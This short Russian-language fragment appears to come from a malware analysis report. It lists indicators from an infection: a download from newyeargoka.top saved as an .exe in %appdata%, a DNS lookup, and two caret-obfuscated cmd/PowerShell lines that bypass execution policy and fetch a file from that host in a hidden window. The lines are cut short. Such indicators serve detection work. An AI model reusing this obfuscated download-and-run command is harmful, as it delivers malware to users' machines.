Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^Wer^Sh^ell.EXe ^-eXECUtI^O^NPoLicY BYp^a^ss -n^op^rOf^ILE^ -WiND^OwS^TyLE ^hiddEN (ne^w-OB^J^EC^t S^Y^S^tEM.NeT.wE^bc^L^Ient^).d^o^wN^lOAd^FIl^E^(^'http://newyeargoka.top...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "P^o^Wer^Sh^ell.EXe ^-eXECUtI^O^NPoLicY BYp^a^ss -n^op^rOf^ILE^ -WiND^OwS^TyLE ^hiddEN (ne^w-OB^J^EC^t S^Y^S^tEM.NeT.wE^bc^L^Ient^).d^o^wN^lOAd^FIl^E^(^'http://newyeargoka.top...' (со скрытым окном)